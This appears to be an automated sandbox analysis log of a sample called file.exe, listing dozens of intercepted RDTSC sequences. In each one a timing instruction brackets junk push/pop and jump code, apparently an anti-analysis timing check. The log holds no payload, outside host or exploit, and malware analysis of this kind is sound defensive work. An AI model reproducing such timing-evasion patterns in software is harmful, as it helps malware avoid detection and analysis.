                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF97C second address: 69A6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jne 00007F6254B873EBh 0x0000000f call dword ptr [ebp+122D1CC1h] 0x00000015 pushad 0x00000016 jmp 00007F6254B873F9h 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007F6254B873E6h 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0300 second address: 6C0323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6254D230B6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F6254D230C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0709 second address: 6C070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C070D second address: 6C072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F6254D230C6h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C072D second address: 6C0757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov cl, 0Ah 0x0000000c push 0000001Eh 0x0000000e mov ecx, edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6254B873EDh 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0B33 second address: 6C0B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0B37 second address: 6C0B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F424A second address: 6F427D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C9h 0x00000007 jmp 00007F6254D230C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F43E9 second address: 6F43F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F46A2 second address: 6F46AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F47FD second address: 6F4816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F6254B873E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4816 second address: 6F481A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F481A second address: 6F4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBE76 second address: 6FBE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6254D230C9h 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBE96 second address: 6FBEAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6254B873EFh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBEAF second address: 6FBEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA80A second address: 6FA810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA810 second address: 6FA819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA819 second address: 6FA81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA81F second address: 6FA827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA9C0 second address: 6FA9C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA9C5 second address: 6FA9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F6254D230BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAAFF second address: 6FAB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAF26 second address: 6FAF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAF2C second address: 6FAF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAF32 second address: 6FAF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB214 second address: 6FB23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007F6254B873E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB23C second address: 6FB244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB535 second address: 6FB53D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB53D second address: 6FB58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230C9h 0x00000008 jmp 00007F6254D230C3h 0x0000000d jmp 00007F6254D230C4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007F6254D230B6h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB6FE second address: 6FB704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB704 second address: 6FB709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB709 second address: 6FB740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EEh 0x00000007 pushad 0x00000008 jmp 00007F6254B873F7h 0x0000000d jmp 00007F6254B873EDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB8C7 second address: 6FB8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB8CD second address: 6FB8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6254B873E6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCD1 second address: 6FBCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCD5 second address: 6FBCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCD9 second address: 6FBCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCE2 second address: 6FBCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700BEA second address: 700C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230C1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700397 second address: 7003B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6254B873F9h 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703BC9 second address: 703C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jns 00007F6254D230B6h 0x0000000e jmp 00007F6254D230C7h 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 jmp 00007F6254D230C7h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6779F9 second address: 6779FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706409 second address: 70640D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70640D second address: 70641B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066AC second address: 7066B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7066B2 second address: 7066E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6254B87400h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6254B873EAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D108 second address: 70D135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C2h 0x00000007 jmp 00007F6254D230C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D135 second address: 70D145 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6254B873E6h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D5EF second address: 70D602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F6254D230B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D602 second address: 70D606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D606 second address: 70D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F6254D230B6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D61D second address: 70D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873ECh 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DA3E second address: 70DA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713645 second address: 713677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F3h 0x00000009 popad 0x0000000a pushad 0x0000000b jnl 00007F6254B873E6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F6254B873EEh 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713677 second address: 71368F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7128B7 second address: 7128BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7128BB second address: 7128D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7128D8 second address: 712906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6254B873EFh 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F6254B873F3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712906 second address: 71290A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71290A second address: 71290E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71290E second address: 71291D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F6254D230B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712A58 second address: 712A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6254B873E6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712A63 second address: 712A73 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6254D230B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712A73 second address: 712A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712D8F second address: 712D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7131E6 second address: 7131EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7131EA second address: 7131EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7131EE second address: 7131F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7131F4 second address: 71321C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230C8h 0x00000008 jng 00007F6254D230B6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71321C second address: 713220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716016 second address: 71601C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71601C second address: 716047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6254B873F6h 0x0000000d jmp 00007F6254B873EBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716327 second address: 716333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6254D230B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716333 second address: 71634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6254B873F3h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E58E second address: 71E5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C7h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E5A9 second address: 71E5D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6254B873E6h 0x00000008 jc 00007F6254B873E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F6254B873F2h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E5D0 second address: 71E5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F6254D230C0h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E5EB second address: 71E613 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F6254B873E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6254B873F9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C5D7 second address: 71C606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6254D230BFh 0x0000000e jo 00007F6254D230BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C751 second address: 71C757 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D0FE second address: 71D118 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F6254D230B6h 0x00000009 jnl 00007F6254D230B6h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F6254D230B6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D118 second address: 71D11C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D703 second address: 71D74D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BAh 0x00000007 jmp 00007F6254D230BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f jg 00007F6254D230FCh 0x00000015 jne 00007F6254D230D5h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D74D second address: 71D751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D751 second address: 71D764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DFAA second address: 71DFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6254B873E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F6254B873E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DFBF second address: 71DFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DFC3 second address: 71DFE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6254B873EEh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007F6254B873E6h 0x00000014 popad 0x00000015 js 00007F6254B873F4h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DFE1 second address: 71DFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E295 second address: 71E2A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E2A1 second address: 71E2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C2h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E2B7 second address: 71E2BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E2BB second address: 71E2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F6254D230BAh 0x00000010 popad 0x00000011 jns 00007F6254D230C9h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E2ED second address: 71E30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6254B873F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726C7E second address: 726CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C4h 0x00000009 pop eax 0x0000000a jnl 00007F6254D230C2h 0x00000010 jnp 00007F6254D230B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DA22 second address: 66DA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DA26 second address: 66DA34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F6254D230B6h 0x0000000e rdtsc
